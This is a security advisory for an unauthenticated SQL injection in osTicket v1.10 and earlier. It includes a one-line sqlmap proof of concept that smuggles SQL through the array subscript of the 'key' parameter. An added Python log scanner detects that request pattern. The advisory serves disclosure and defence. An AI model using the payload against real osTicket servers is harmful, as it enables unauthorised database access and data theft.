1. ADVISORY INFORMATION
========================================
Title: osTicket v1.10 Unauthenticated SQL Injection
Application: osTicket
Bugs: SQL Injection
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Authentication Required: NO
Versions Affected: <= v1.10
Technology: PHP
Vendor URL: http://osticket.com/
CVSSv3 Score: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Date Found: 12 Sep 2017
Author: Mehmet Ince
Advisory:
https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/

2. CREDIT
========================================
This vulnerability was identified during a penetration test
by Mehmet INCE from PRODAFT / INVICTUS

3. VERSIONS AFFECTED
========================================
osTicket < 1.10

5. Technical Details & POC
========================================
Please visit the advisory URL for technical details.

PoC code:
python sqlmap.py -u "http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL

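Added example (not part of the original advisory or of osTicket's code): a Python
log check built on the PoC request shape above, where the injected text sits inside
the array subscript of the "key" parameter. The log format, the sample lines and the
rule that a subscript holds only letters, digits, "_" and "-" are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Assumption: legitimate names look like name, name[], name[0] or name[field].
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+(?:\[[A-Za-z0-9_-]*\])*$")
# Assumption: access log in Apache/nginx "combined" style.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; only the second request target is taken from the PoC.
SAMPLE_LOG = [
    '198.51.100.4 - - [12/Sep/2017:10:00:00 +0000] '
    '"GET /file.php?key=abc123&signature=1&expires=15104725311 HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Sep/2017:10:00:01 +0000] '
    '"GET /file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311 HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Sep/2017:10:00:02 +0000] '
    '"GET /search.php?tags[0]=vpn&tags[1]=mail HTTP/1.1" 200 128',
]


def suspicious_params(request_target):
    """Return decoded parameter names whose array subscript holds unexpected characters."""
    query = request_target.partition("?")[2]
    flagged = []
    # parse_qsl percent-decodes names, so %5B, %60 and %23 are compared as [, ` and #.
    for name, _value in parse_qsl(query, keep_blank_values=True):
        if "[" in name and not SAFE_NAME.match(name):
            flagged.append(name)
    return flagged


def scan_log(lines):
    """Return (line_number, parameter_name) for every flagged parameter in the log."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            hits.extend((number, name) for name in suspicious_params(match.group(1)))
    return hits


if __name__ == "__main__":
    for number, name in scan_log(SAMPLE_LOG):
        print(f"line {number}: suspicious parameter name {name!r}")
```
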
6. RISK
========================================
The vulnerability allows remote attackers to execute a SQL query on
the database system.

7. REFERENCES
========================================
https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/